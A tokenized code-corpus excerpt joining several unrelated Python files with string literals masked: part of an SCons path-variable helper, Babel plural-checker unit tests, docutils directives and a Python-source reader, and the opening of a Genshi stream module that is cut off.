<EOL> if validator is None : <EOL> validator = self . PathExists <EOL> if SCons . Util . is_List ( key ) or SCons . Util . is_Tuple ( key ) : <EOL> return ( key , '<STR_LIT>' % ( help , key [ <NUM_LIT:0> ] ) , default , <EOL> validator , None ) <EOL> else : <EOL> return ( key , '<STR_LIT>' % ( help , key ) , default , <EOL> validator , None ) <EOL> PathVariable = _PathVariableClass ( ) </s>
<s> from datetime import datetime <EOL> import time <EOL> import unittest <EOL> from StringIO import StringIO <EOL> from babel import __version__ as VERSION <EOL> from babel . core import Locale , UnknownLocaleError <EOL> from babel . dates import format_datetime <EOL> from babel . messages import checkers <EOL> from babel . messages . plurals import PLURALS <EOL> from babel . messages . pofile import read_po <EOL> from babel . util import LOCALTZ <EOL> class CheckersTestCase ( unittest . TestCase ) : <EOL> def test_1_num_plurals_checkers ( self ) : <EOL> for _locale in [ p for p in PLURALS if PLURALS [ p ] [ <NUM_LIT:0> ] == <NUM_LIT:1> ] : <EOL> try : <EOL> locale = Locale . parse ( _locale ) <EOL> except UnknownLocaleError : <EOL> continue <EOL> po_file = ( ur """<STR_LIT>""" % dict ( locale = _locale , <EOL> english_name = locale . english_name , <EOL> version = VERSION , <EOL> year = time . strftime ( '<STR_LIT>' ) , <EOL> date = format_datetime ( datetime . now ( LOCALTZ ) , <EOL> '<STR_LIT>' , <EOL> tzinfo = LOCALTZ , locale = _locale ) , <EOL> num_plurals = PLURALS [ _locale ] [ <NUM_LIT:0> ] , <EOL> plural_expr = PLURALS [ _locale ] [ <NUM_LIT:0> ] ) ) . encode ( '<STR_LIT:utf-8>' ) <EOL> catalog = read_po ( StringIO ( po_file ) , _locale ) <EOL> message = catalog [ '<STR_LIT>' ] <EOL> checkers . num_plurals ( catalog , message ) <EOL> def test_2_num_plurals_checkers ( self ) : <EOL> for _locale in [ p for p in PLURALS if PLURALS [ p ] [ <NUM_LIT:0> ] == <NUM_LIT:2> ] : <EOL> if _locale in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> _locale = '<STR_LIT>' <EOL> num_plurals = PLURALS [ _locale . split ( '<STR_LIT:_>' ) [ <NUM_LIT:0> ] ] [ <NUM_LIT:0> ] <EOL> plural_expr = PLURALS [ _locale . split ( '<STR_LIT:_>' ) [ <NUM_LIT:0> ] ] [ <NUM_LIT:1> ] <EOL> else : <EOL> num_plurals = PLURALS [ _locale ] [ <NUM_LIT:0> ] <EOL> plural_expr = PLURALS [ _locale ] [ <NUM_LIT:1> ] <EOL> try : <EOL> locale = Locale ( _locale ) <EOL> date = format_datetime ( datetime . now ( LOCALTZ ) , <EOL> '<STR_LIT>' , <EOL> tzinfo = LOCALTZ , locale = _locale ) <EOL> except UnknownLocaleError : <EOL> continue <EOL> po_file = ( ur """<STR_LIT>""" % dict ( locale = _locale , <EOL> english_name = locale . english_name , <EOL> version = VERSION , <EOL> year = time . strftime ( '<STR_LIT>' ) , <EOL> date = date , <EOL> num_plurals = num_plurals , <EOL> plural_expr = plural_expr ) ) . encode ( '<STR_LIT:utf-8>' ) <EOL> catalog = read_po ( StringIO ( po_file ) , _locale ) <EOL> message = catalog [ '<STR_LIT>' ] <EOL> checkers . num_plurals ( catalog , message ) <EOL> def test_3_num_plurals_checkers ( self ) : <EOL> for _locale in [ p for p in PLURALS if PLURALS [ p ] [ <NUM_LIT:0> ] == <NUM_LIT:3> ] : <EOL> po_file = r"""<STR_LIT>""" % dict ( locale = _locale , <EOL> english_name = Locale . parse ( _locale ) . english_name , <EOL> version = VERSION , <EOL> year = time . strftime ( '<STR_LIT>' ) , <EOL> date = format_datetime ( datetime . now ( LOCALTZ ) , <EOL> '<STR_LIT>' , <EOL> tzinfo = LOCALTZ , locale = _locale ) , <EOL> num_plurals = PLURALS [ _locale ] [ <NUM_LIT:0> ] , <EOL> plural_expr = PLURALS [ _locale ] [ <NUM_LIT:0> ] ) <EOL> catalog = read_po ( StringIO ( po_file ) , _locale ) <EOL> message = catalog [ '<STR_LIT>' ] <EOL> checkers . num_plurals ( catalog , message ) <EOL> def test_4_num_plurals_checkers ( self ) : <EOL> for _locale in [ p for p in PLURALS if PLURALS [ p ] [ <NUM_LIT:0> ] == <NUM_LIT:4> ] : <EOL> po_file = r"""<STR_LIT>""" % dict ( locale = _locale , <EOL> english_name = Locale . parse ( _locale ) . english_name , <EOL> version = VERSION , <EOL> year = time . strftime ( '<STR_LIT>' ) , <EOL> date = format_datetime ( datetime . now ( LOCALTZ ) , <EOL> '<STR_LIT>' , <EOL> tzinfo = LOCALTZ , locale = _locale ) , <EOL> num_plurals = PLURALS [ _locale ] [ <NUM_LIT:0> ] , <EOL> plural_expr = PLURALS [ _locale ] [ <NUM_LIT:0> ] ) <EOL> catalog = read_po ( StringIO ( po_file ) , _locale ) <EOL> message = catalog [ '<STR_LIT>' ] <EOL> checkers . num_plurals ( catalog , message ) <EOL> def test_5_num_plurals_checkers ( self ) : <EOL> for _locale in [ p for p in PLURALS if PLURALS [ p ] [ <NUM_LIT:0> ] == <NUM_LIT:5> ] : <EOL> po_file = r"""<STR_LIT>""" % dict ( locale = _locale , <EOL> english_name = Locale . parse ( _locale ) . english_name , <EOL> version = VERSION , <EOL> year = time . strftime ( '<STR_LIT>' ) , <EOL> date = format_datetime ( datetime . now ( LOCALTZ ) , <EOL> '<STR_LIT>' , <EOL> tzinfo = LOCALTZ , locale = _locale ) , <EOL> num_plurals = PLURALS [ _locale ] [ <NUM_LIT:0> ] , <EOL> plural_expr = PLURALS [ _locale ] [ <NUM_LIT:0> ] ) <EOL> catalog = read_po ( StringIO ( po_file ) , _locale ) <EOL> message = catalog [ '<STR_LIT>' ] <EOL> checkers . num_plurals ( catalog , message ) <EOL> def test_6_num_plurals_checkers ( self ) : <EOL> for _locale in [ p for p in PLURALS if PLURALS [ p ] [ <NUM_LIT:0> ] == <NUM_LIT:6> ] : <EOL> po_file = r"""<STR_LIT>""" % dict ( locale = _locale , <EOL> english_name = Locale . parse ( _locale ) . english_name , <EOL> version = VERSION , <EOL> year = time . strftime ( '<STR_LIT>' ) , <EOL> date = format_datetime ( datetime . now ( LOCALTZ ) , <EOL> '<STR_LIT>' , <EOL> tzinfo = LOCALTZ , locale = _locale ) , <EOL> num_plurals = PLURALS [ _locale ] [ <NUM_LIT:0> ] , <EOL> plural_expr = PLURALS [ _locale ] [ <NUM_LIT:0> ] ) <EOL> catalog = read_po ( StringIO ( po_file ) , _locale ) <EOL> message = catalog [ '<STR_LIT>' ] <EOL> checkers . num_plurals ( catalog , message ) <EOL> def suite ( ) : <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . makeSuite ( CheckersTestCase ) ) <EOL> return suite <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( defaultTest = '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> from docutils import nodes , languages <EOL> from docutils . transforms import parts <EOL> from docutils . parsers . rst import Directive <EOL> from docutils . parsers . rst import directives <EOL> class Contents ( Directive ) : <EOL> """<STR_LIT>""" <EOL> backlinks_values = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:none>' ) <EOL> def backlinks ( arg ) : <EOL> value = directives . choice ( arg , Contents . backlinks_values ) <EOL> if value == '<STR_LIT:none>' : <EOL> return None <EOL> else : <EOL> return value <EOL> required_arguments = <NUM_LIT:0> <EOL> optional_arguments = <NUM_LIT:1> <EOL> final_argument_whitespace = True <EOL> option_spec = { '<STR_LIT>' : directives . nonnegative_int , <EOL> '<STR_LIT>' : directives . flag , <EOL> '<STR_LIT>' : backlinks , <EOL> '<STR_LIT:class>' : directives . class_option } <EOL> def run ( self ) : <EOL> if not ( self . state_machine . match_titles <EOL> or isinstance ( self . state_machine . node , nodes . sidebar ) ) : <EOL> raise self . error ( '<STR_LIT>' <EOL> '<STR_LIT>' % self . name ) <EOL> document = self . state_machine . document <EOL> language = languages . get_language ( document . settings . language_code ) <EOL> if self . arguments : <EOL> title_text = self . arguments [ <NUM_LIT:0> ] <EOL> text_nodes , messages = self . state . inline_text ( title_text , <EOL> self . lineno ) <EOL> title = nodes . title ( title_text , '<STR_LIT>' , * text_nodes ) <EOL> else : <EOL> messages = [ ] <EOL> if '<STR_LIT>' in self . options : <EOL> title = None <EOL> else : <EOL> title = nodes . title ( '<STR_LIT>' , language . labels [ '<STR_LIT>' ] ) <EOL> topic = nodes . topic ( classes = [ '<STR_LIT>' ] ) <EOL> topic [ '<STR_LIT>' ] += self . options . get ( '<STR_LIT:class>' , [ ] ) <EOL> if '<STR_LIT>' in self . options : <EOL> topic [ '<STR_LIT>' ] . append ( '<STR_LIT>' ) <EOL> if title : <EOL> name = title . astext ( ) <EOL> topic += title <EOL> else : <EOL> name = language . labels [ '<STR_LIT>' ] <EOL> name = nodes . fully_normalize_name ( name ) <EOL> if not document . has_name ( name ) : <EOL> topic [ '<STR_LIT>' ] . append ( name ) <EOL> document . note_implicit_target ( topic ) <EOL> pending = nodes . pending ( parts . Contents , rawsource = self . block_text ) <EOL> pending . details . update ( self . options ) <EOL> document . note_pending ( pending ) <EOL> topic += pending <EOL> return [ topic ] + messages <EOL> class Sectnum ( Directive ) : <EOL> """<STR_LIT>""" <EOL> option_spec = { '<STR_LIT>' : int , <EOL> '<STR_LIT:start>' : int , <EOL> '<STR_LIT>' : directives . unchanged_required , <EOL> '<STR_LIT>' : directives . unchanged_required } <EOL> def run ( self ) : <EOL> pending = nodes . pending ( parts . SectNum ) <EOL> pending . details . update ( self . options ) <EOL> self . state_machine . document . note_pending ( pending ) <EOL> return [ pending ] <EOL> class Header ( Directive ) : <EOL> """<STR_LIT>""" <EOL> has_content = True <EOL> def run ( self ) : <EOL> self . assert_has_content ( ) <EOL> header = self . state_machine . document . get_decoration ( ) . get_header ( ) <EOL> self . state . nested_parse ( self . content , self . content_offset , header ) <EOL> return [ ] <EOL> class Footer ( Directive ) : <EOL> """<STR_LIT>""" <EOL> has_content = True <EOL> def run ( self ) : <EOL> self . assert_has_content ( ) <EOL> footer = self . state_machine . document . get_decoration ( ) . get_footer ( ) <EOL> self . state . nested_parse ( self . content , self . content_offset , footer ) <EOL> return [ ] </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> import sys <EOL> import compiler <EOL> import compiler . ast <EOL> import tokenize <EOL> import token <EOL> from compiler . consts import OP_ASSIGN <EOL> from compiler . visitor import ASTVisitor <EOL> from docutils . readers . python import pynodes <EOL> from docutils . nodes import Text <EOL> def parse_module ( module_text , filename ) : <EOL> """<STR_LIT>""" <EOL> ast = compiler . parse ( module_text ) <EOL> token_parser = TokenParser ( module_text ) <EOL> visitor = ModuleVisitor ( filename , token_parser ) <EOL> compiler . walk ( ast , visitor , walker = visitor ) <EOL> return visitor . module <EOL> class BaseVisitor ( ASTVisitor ) : <EOL> def __init__ ( self , token_parser ) : <EOL> ASTVisitor . __init__ ( self ) <EOL> self . token_parser = token_parser <EOL> self . context = [ ] <EOL> self . documentable = None <EOL> def default ( self , node , * args ) : <EOL> self . documentable = None <EOL> def default_visit ( self , node , * args ) : <EOL> ASTVisitor . default ( self , node , * args ) <EOL> class DocstringVisitor ( BaseVisitor ) : <EOL> def visitDiscard ( self , node ) : <EOL> if self . documentable : <EOL> self . visit ( node . expr ) <EOL> def visitConst ( self , node ) : <EOL> if self . documentable : <EOL> if type ( node . value ) in ( str , unicode ) : <EOL> self . documentable . append ( make_docstring ( node . value , node . lineno ) ) <EOL> else : <EOL> self . documentable = None <EOL> def visitStmt ( self , node ) : <EOL> self . default_visit ( node ) <EOL> class AssignmentVisitor ( DocstringVisitor ) : <EOL> def visitAssign ( self , node ) : <EOL> visitor = AttributeVisitor ( self . token_parser ) <EOL> compiler . walk ( node , visitor , walker = visitor ) <EOL> if visitor . attributes : <EOL> self . context [ - <NUM_LIT:1> ] . extend ( visitor . attributes ) <EOL> if len ( visitor . attributes ) == <NUM_LIT:1> : <EOL> self . documentable = visitor . attributes [ <NUM_LIT:0> ] <EOL> else : <EOL> self . documentable = None <EOL> class ModuleVisitor ( AssignmentVisitor ) : <EOL> def __init__ ( self , filename , token_parser ) : <EOL> AssignmentVisitor . __init__ ( self , token_parser ) <EOL> self . filename = filename <EOL> self . module = None <EOL> def visitModule ( self , node ) : <EOL> self . module = module = pynodes . module_section ( ) <EOL> module [ '<STR_LIT:filename>' ] = self . filename <EOL> append_docstring ( module , node . doc , node . lineno ) <EOL> self . context . append ( module ) <EOL> self . documentable = module <EOL> self . visit ( node . node ) <EOL> self . context . pop ( ) <EOL> def visitImport ( self , node ) : <EOL> self . context [ - <NUM_LIT:1> ] += make_import_group ( names = node . names , <EOL> lineno = node . lineno ) <EOL> self . documentable = None <EOL> def visitFrom ( self , node ) : <EOL> self . context [ - <NUM_LIT:1> ] . append ( <EOL> make_import_group ( names = node . names , from_name = node . modname , <EOL> lineno = node . lineno ) ) <EOL> self . documentable = None <EOL> def visitFunction ( self , node ) : <EOL> visitor = FunctionVisitor ( self . token_parser , <EOL> function_class = pynodes . function_section ) <EOL> compiler . walk ( node , visitor , walker = visitor ) <EOL> self . context [ - <NUM_LIT:1> ] . append ( visitor . function ) <EOL> def visitClass ( self , node ) : <EOL> visitor = ClassVisitor ( self . token_parser ) <EOL> compiler . walk ( node , visitor , walker = visitor ) <EOL> self . context [ - <NUM_LIT:1> ] . append ( visitor . klass ) <EOL> class AttributeVisitor ( BaseVisitor ) : <EOL> def __init__ ( self , token_parser ) : <EOL> BaseVisitor . __init__ ( self , token_parser ) <EOL> self . attributes = pynodes . class_attribute_section ( ) <EOL> def visitAssign ( self , node ) : <EOL> for child in node . nodes : <EOL> self . dispatch ( child ) <EOL> expression_text = self . token_parser . rhs ( node . lineno ) <EOL> expression = pynodes . expression_value ( ) <EOL> expression . append ( Text ( expression_text ) ) <EOL> for attribute in self . attributes : <EOL> attribute . append ( expression ) <EOL> def visitAssName ( self , node ) : <EOL> self . attributes . append ( make_attribute ( node . name , <EOL> lineno = node . lineno ) ) <EOL> def visitAssTuple ( self , node ) : <EOL> attributes = self . attributes <EOL> self . attributes = [ ] <EOL> self . default_visit ( node ) <EOL> n = pynodes . attribute_tuple ( ) <EOL> n . extend ( self . attributes ) <EOL> n [ '<STR_LIT>' ] = self . attributes [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> attributes . append ( n ) <EOL> self . attributes = attributes <EOL> def visitAssAttr ( self , node ) : <EOL> self . default_visit ( node , node . attrname ) <EOL> def visitGetattr ( self , node , suffix ) : <EOL> self . default_visit ( node , node . attrname + '<STR_LIT:.>' + suffix ) <EOL> def visitName ( self , node , suffix ) : <EOL> self . attributes . append ( make_attribute ( node . name + '<STR_LIT:.>' + suffix , <EOL> lineno = node . lineno ) ) <EOL> class FunctionVisitor ( DocstringVisitor ) : <EOL> in_function = <NUM_LIT:0> <EOL> def __init__ ( self , token_parser , function_class ) : <EOL> DocstringVisitor . __init__ ( self , token_parser ) <EOL> self . function_class = function_class <EOL> def visitFunction ( self , node ) : <EOL> if self . in_function : <EOL> self . documentable = None <EOL> return <EOL> self . in_function = <NUM_LIT:1> <EOL> self . function = function = make_function_like_section ( <EOL> name = node . name , <EOL> lineno = node . lineno , <EOL> doc = node . doc , <EOL> function_class = self . function_class ) <EOL> self . context . append ( function ) <EOL> self . documentable = function <EOL> self . parse_parameter_list ( node ) <EOL> self . visit ( node . code ) <EOL> self . context . pop ( ) <EOL> def parse_parameter_list ( self , node ) : <EOL> parameters = [ ] <EOL> special = [ ] <EOL> argnames = list ( node . argnames ) <EOL> if node . kwargs : <EOL> special . append ( make_parameter ( argnames [ - <NUM_LIT:1> ] , excess_keyword = <NUM_LIT:1> ) ) <EOL> argnames . pop ( ) <EOL> if node . varargs : <EOL> special . append ( make_parameter ( argnames [ - <NUM_LIT:1> ] , <EOL> excess_positional = <NUM_LIT:1> ) ) <EOL> argnames . pop ( ) <EOL> defaults = list ( node . defaults ) <EOL> defaults = [ None ] * ( len ( argnames ) - len ( defaults ) ) + defaults <EOL> function_parameters = self . token_parser . function_parameters ( <EOL> node . lineno ) <EOL> for argname , default in zip ( argnames , defaults ) : <EOL> if type ( argname ) is tuple : <EOL> parameter = pynodes . parameter_tuple ( ) <EOL> for tuplearg in argname : <EOL> parameter . append ( make_parameter ( tuplearg ) ) <EOL> argname = normalize_parameter_name ( argname ) <EOL> else : <EOL> parameter = make_parameter ( argname ) <EOL> if default : <EOL> n_default = pynodes . parameter_default ( ) <EOL> n_default . append ( Text ( function_parameters [ argname ] ) ) <EOL> parameter . append ( n_default ) <EOL> parameters . append ( parameter ) <EOL> if parameters or special : <EOL> special . reverse ( ) <EOL> parameters . extend ( special ) <EOL> parameter_list = pynodes . parameter_list ( ) <EOL> parameter_list . extend ( parameters ) <EOL> self . function . append ( parameter_list ) <EOL> class ClassVisitor ( AssignmentVisitor ) : <EOL> in_class = <NUM_LIT:0> <EOL> def __init__ ( self , token_parser ) : <EOL> AssignmentVisitor . __init__ ( self , token_parser ) <EOL> self . bases = [ ] <EOL> def visitClass ( self , node ) : <EOL> if self . in_class : <EOL> self . documentable = None <EOL> return <EOL> self . in_class = <NUM_LIT:1> <EOL> for base in node . bases : <EOL> self . visit ( base ) <EOL> self . klass = klass = make_class_section ( node . name , self . bases , <EOL> doc = node . doc , <EOL> lineno = node . lineno ) <EOL> self . context . append ( klass ) <EOL> self . documentable = klass <EOL> self . visit ( node . code ) <EOL> self . context . pop ( ) <EOL> def visitGetattr ( self , node , suffix = None ) : <EOL> if suffix : <EOL> name = node . attrname + '<STR_LIT:.>' + suffix <EOL> else : <EOL> name = node . attrname <EOL> self . default_visit ( node , name ) <EOL> def visitName ( self , node , suffix = None ) : <EOL> if suffix : <EOL> name = node . name + '<STR_LIT:.>' + suffix <EOL> else : <EOL> name = node . name <EOL> self . bases . append ( name ) <EOL> def visitFunction ( self , node ) : <EOL> if node . name == '<STR_LIT>' : <EOL> visitor = InitMethodVisitor ( self . token_parser , <EOL> function_class = pynodes . method_section ) <EOL> compiler . walk ( node , visitor , walker = visitor ) <EOL> else : <EOL> visitor = FunctionVisitor ( self . token_parser , <EOL> function_class = pynodes . method_section ) <EOL> compiler . walk ( node , visitor , walker = visitor ) <EOL> self . context [ - <NUM_LIT:1> ] . append ( visitor . function ) <EOL> class InitMethodVisitor ( FunctionVisitor , AssignmentVisitor ) : pass <EOL> class TokenParser : <EOL> def __init__ ( self , text ) : <EOL> self . text = text + '<STR_LIT>' <EOL> self . lines = self . text . splitlines ( <NUM_LIT:1> ) <EOL> self . generator = tokenize . generate_tokens ( iter ( self . lines ) . next ) <EOL> self . next ( ) <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> self . token = self . generator . next ( ) <EOL> self . type , self . string , self . start , self . end , self . line = self . token <EOL> return self . token <EOL> def goto_line ( self , lineno ) : <EOL> while self . start [ <NUM_LIT:0> ] < lineno : <EOL> self . next ( ) <EOL> return token <EOL> def rhs ( self , lineno ) : <EOL> """<STR_LIT>""" <EOL> self . goto_line ( lineno ) <EOL> while self . string != '<STR_LIT:=>' : <EOL> self . next ( ) <EOL> self . stack = None <EOL> while self . type != token . NEWLINE and self . string != '<STR_LIT:;>' : <EOL> if self . string == '<STR_LIT:=>' and not self . stack : <EOL> self . tokens = [ ] <EOL> self . stack = [ ] <EOL> self . _type = None <EOL> self . _string = None <EOL> self . _backquote = <NUM_LIT:0> <EOL> else : <EOL> self . note_token ( ) <EOL> self . next ( ) <EOL> self . next ( ) <EOL> text = '<STR_LIT>' . join ( self . tokens ) <EOL> return text . strip ( ) <EOL> closers = { '<STR_LIT:)>' : '<STR_LIT:(>' , '<STR_LIT:]>' : '<STR_LIT:[>' , '<STR_LIT:}>' : '<STR_LIT:{>' } <EOL> openers = { '<STR_LIT:(>' : <NUM_LIT:1> , '<STR_LIT:[>' : <NUM_LIT:1> , '<STR_LIT:{>' : <NUM_LIT:1> } <EOL> del_ws_prefix = { '<STR_LIT:.>' : <NUM_LIT:1> , '<STR_LIT:=>' : <NUM_LIT:1> , '<STR_LIT:)>' : <NUM_LIT:1> , '<STR_LIT:]>' : <NUM_LIT:1> , '<STR_LIT:}>' : <NUM_LIT:1> , '<STR_LIT::>' : <NUM_LIT:1> , '<STR_LIT:U+002C>' : <NUM_LIT:1> } <EOL> no_ws_suffix = { '<STR_LIT:.>' : <NUM_LIT:1> , '<STR_LIT:=>' : <NUM_LIT:1> , '<STR_LIT:(>' : <NUM_LIT:1> , '<STR_LIT:[>' : <NUM_LIT:1> , '<STR_LIT:{>' : <NUM_LIT:1> } <EOL> def note_token ( self ) : <EOL> if self . type == tokenize . NL : <EOL> return <EOL> del_ws = self . string in self . del_ws_prefix <EOL> append_ws = self . string not in self . no_ws_suffix <EOL> if self . string in self . openers : <EOL> self . stack . append ( self . string ) <EOL> if ( self . _type == token . NAME <EOL> or self . _string in self . closers ) : <EOL> del_ws = <NUM_LIT:1> <EOL> elif self . string in self . closers : <EOL> assert self . stack [ - <NUM_LIT:1> ] == self . closers [ self . string ] <EOL> self . stack . pop ( ) <EOL> elif self . string == '<STR_LIT>' : <EOL> if self . _backquote : <EOL> del_ws = <NUM_LIT:1> <EOL> assert self . stack [ - <NUM_LIT:1> ] == '<STR_LIT>' <EOL> self . stack . pop ( ) <EOL> else : <EOL> append_ws = <NUM_LIT:0> <EOL> self . stack . append ( '<STR_LIT>' ) <EOL> self . _backquote = not self . _backquote <EOL> if del_ws and self . tokens and self . tokens [ - <NUM_LIT:1> ] == '<STR_LIT:U+0020>' : <EOL> del self . tokens [ - <NUM_LIT:1> ] <EOL> self . tokens . append ( self . string ) <EOL> self . _type = self . type <EOL> self . _string = self . string <EOL> if append_ws : <EOL> self . tokens . append ( '<STR_LIT:U+0020>' ) <EOL> def function_parameters ( self , lineno ) : <EOL> """<STR_LIT>""" <EOL> self . goto_line ( lineno ) <EOL> while self . string != '<STR_LIT>' : <EOL> self . next ( ) <EOL> while self . string != '<STR_LIT:(>' : <EOL> self . next ( ) <EOL> name = None <EOL> default = None <EOL> parameter_tuple = None <EOL> self . tokens = [ ] <EOL> parameters = { } <EOL> self . stack = [ self . string ] <EOL> self . next ( ) <EOL> while <NUM_LIT:1> : <EOL> if len ( self . stack ) == <NUM_LIT:1> : <EOL> if parameter_tuple : <EOL> name = '<STR_LIT>' . join ( self . tokens ) . strip ( ) <EOL> self . tokens = [ ] <EOL> parameter_tuple = None <EOL> if self . string in ( '<STR_LIT:)>' , '<STR_LIT:U+002C>' ) : <EOL> if name : <EOL> if self . tokens : <EOL> default_text = '<STR_LIT>' . join ( self . tokens ) . strip ( ) <EOL> else : <EOL> default_text = None <EOL> parameters [ name ] = default_text <EOL> self . tokens = [ ] <EOL> name = None <EOL> default = None <EOL> if self . string == '<STR_LIT:)>' : <EOL> break <EOL> elif self . type == token . NAME : <EOL> if name and default : <EOL> self . note_token ( ) <EOL> else : <EOL> assert name is None , ( <EOL> '<STR_LIT>' <EOL> % ( self . token , name , parameters , self . stack ) ) <EOL> name = self . string <EOL> elif self . string == '<STR_LIT:=>' : <EOL> assert name is not None , '<STR_LIT>' % ( self . token , ) <EOL> assert default is None , '<STR_LIT>' % ( self . token , ) <EOL> assert self . tokens == [ ] , '<STR_LIT>' % ( self . token , ) <EOL> default = <NUM_LIT:1> <EOL> self . _type = None <EOL> self . _string = None <EOL> self . _backquote = <NUM_LIT:0> <EOL> elif name : <EOL> self . note_token ( ) <EOL> elif self . string == '<STR_LIT:(>' : <EOL> parameter_tuple = <NUM_LIT:1> <EOL> self . _type = None <EOL> self . _string = None <EOL> self . _backquote = <NUM_LIT:0> <EOL> self . note_token ( ) <EOL> else : <EOL> assert ( self . string in ( '<STR_LIT:*>' , '<STR_LIT>' , '<STR_LIT:\n>' ) <EOL> or self . type == tokenize . COMMENT ) , ( <EOL> '<STR_LIT>' % ( self . token , ) ) <EOL> else : <EOL> self . note_token ( ) <EOL> self . next ( ) <EOL> return parameters <EOL> def make_docstring ( doc , lineno ) : <EOL> n = pynodes . docstring ( ) <EOL> if lineno : <EOL> n [ '<STR_LIT>' ] = lineno <EOL> n . append ( Text ( doc ) ) <EOL> return n <EOL> def append_docstring ( node , doc , lineno ) : <EOL> if doc : <EOL> node . append ( make_docstring ( doc , lineno ) ) <EOL> def make_class_section ( name , bases , lineno , doc ) : <EOL> n = pynodes . class_section ( ) <EOL> n [ '<STR_LIT>' ] = lineno <EOL> n . append ( make_object_name ( name ) ) <EOL> for base in bases : <EOL> b = pynodes . class_base ( ) <EOL> b . append ( make_object_name ( base ) ) <EOL> n . append ( b ) <EOL> append_docstring ( n , doc , lineno ) <EOL> return n <EOL> def make_object_name ( name ) : <EOL> n = pynodes . object_name ( ) <EOL> n . append ( Text ( name ) ) <EOL> return n <EOL> def make_function_like_section ( name , lineno , doc , function_class ) : <EOL> n = function_class ( ) <EOL> n [ '<STR_LIT>' ] = lineno <EOL> n . append ( make_object_name ( name ) ) <EOL> append_docstring ( n , doc , lineno ) <EOL> return n <EOL> def make_import_group ( names , lineno , from_name = None ) : <EOL> n = pynodes . import_group ( ) <EOL> n [ '<STR_LIT>' ] = lineno <EOL> if from_name : <EOL> n_from = pynodes . import_from ( ) <EOL> n_from . append ( Text ( from_name ) ) <EOL> n . append ( n_from ) <EOL> for name , alias in names : <EOL> n_name = pynodes . import_name ( ) <EOL> n_name . append ( Text ( name ) ) <EOL> if alias : <EOL> n_alias = pynodes . import_alias ( ) <EOL> n_alias . append ( Text ( alias ) ) <EOL> n_name . append ( n_alias ) <EOL> n . append ( n_name ) <EOL> return n <EOL> def make_class_attribute ( name , lineno ) : <EOL> n = pynodes . class_attribute ( ) <EOL> n [ '<STR_LIT>' ] = lineno <EOL> n . append ( Text ( name ) ) <EOL> return n <EOL> def make_attribute ( name , lineno ) : <EOL> n = pynodes . attribute ( ) <EOL> n [ '<STR_LIT>' ] = lineno <EOL> n . append ( make_object_name ( name ) ) <EOL> return n <EOL> def make_parameter ( name , excess_keyword = <NUM_LIT:0> , excess_positional = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> n = pynodes . parameter ( ) <EOL> n . append ( make_object_name ( name ) ) <EOL> assert not excess_keyword or not excess_positional <EOL> if excess_keyword : <EOL> n [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if excess_positional : <EOL> n [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> return n <EOL> def trim_docstring ( text ) : <EOL> """<STR_LIT>""" <EOL> if not text : <EOL> return text <EOL> lines = text . expandtabs ( ) . splitlines ( ) <EOL> indent = sys . maxint <EOL> for line in lines [ <NUM_LIT:1> : ] : <EOL> stripped = line . lstrip ( ) <EOL> if stripped : <EOL> indent = min ( indent , len ( line ) - len ( stripped ) ) <EOL> trimmed = [ lines [ <NUM_LIT:0> ] . strip ( ) ] <EOL> if indent < sys . maxint : <EOL> for line in lines [ <NUM_LIT:1> : ] : <EOL> trimmed . append ( line [ indent : ] . rstrip ( ) ) <EOL> while trimmed and not trimmed [ - <NUM_LIT:1> ] : <EOL> trimmed . pop ( ) <EOL> while trimmed and not trimmed [ <NUM_LIT:0> ] : <EOL> trimmed . pop ( <NUM_LIT:0> ) <EOL> return '<STR_LIT:\n>' . join ( trimmed ) <EOL> def normalize_parameter_name ( name ) : <EOL> """<STR_LIT>""" <EOL> if type ( name ) is tuple : <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( [ normalize_parameter_name ( n ) for n in name ] ) <EOL> else : <EOL> return name <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> args = sys . argv [ <NUM_LIT:1> : ] <EOL> if args [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> filename = args [ <NUM_LIT:1> ] <EOL> module_text = open ( filename ) . read ( ) <EOL> ast = compiler . parse ( module_text ) <EOL> visitor = compiler . visitor . ExampleASTVisitor ( ) <EOL> compiler . walk ( ast , visitor , walker = visitor , verbose = <NUM_LIT:1> ) <EOL> else : <EOL> filename = args [ <NUM_LIT:0> ] <EOL> content = open ( filename ) . read ( ) <EOL> print parse_module ( content , filename ) . pformat ( ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> from functools import reduce <EOL> except ImportError : <EOL> pass <EOL> from itertools import chain <EOL> import operator <EOL> from genshi . util import plaintext , stripentities , striptags <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> __docformat__ = '<STR_LIT>' <EOL> class StreamEventKind ( str ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ ] <EOL> _instances = { } <EOL> def __new__ ( cls , val ) : <EOL> return cls . _instances . setdefault ( val , str . __new__ ( cls , val ) ) <EOL> class Stream ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> START = StreamEventKind ( '<STR_LIT>' ) <EOL> END = StreamEventKind ( '<STR_LIT>' ) <EOL> TEXT = StreamEventKind ( '<STR_LIT>' ) <EOL> XML_DECL = StreamEventKind ( '<STR_LIT>' ) <EOL> DOCTYPE = StreamEventKind ( '<STR_LIT>' ) <EOL> START_NS = StreamEventKind ( '<STR_LIT>' ) <EOL> END_NS = StreamEventKind ( '<STR_LIT>' ) <EOL> START_CDATA = StreamEventKind ( '<STR_LIT>' ) <EOL> END_CDATA = StreamEventKind ( '<STR_LIT>' ) <EOL> PI = StreamEventKind ( '<STR_LIT>' ) <EOL> COMMENT = StreamEventKind ( '<STR_LIT>' ) <EOL> def __init__ ( self , events , serializer = None ) : <EOL> 